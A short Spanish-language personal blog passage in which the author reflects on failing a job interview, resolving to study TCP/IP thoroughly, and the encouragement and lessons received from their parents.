No hace falta deciros que no me cogieron para el puesto de trabajo, pero la experiencia me sirvió para darme cuenta de que necesitaba mejorar y aprender mucho, mucho. Salí de allí con rabia y me prometí que no me volvería a pasar esto y, por supuesto, con la decisión de aprender TCP/IP a saco.

Mi madre me consoló, me escuchó e insistió en que tuviera en cuenta que nadie nacía sabiendo y que todos podíamos aprender. Mi padre me dijo que me venía bien la lección de humildad, para no olvidarme de que en esta vida hay que estar preparado si quieres llegar a algo y no acabar pasando frio en invierno y calor en verano en las obras como hasta el momento.

Si a alguno de vosotros le sirven estas lecciones, esta experiencia habrá ayudado a más de uno porque a mí me ayudo a centrarme en lo que tenía que hacer: Estudiar y aprender.

Saludos Malignos!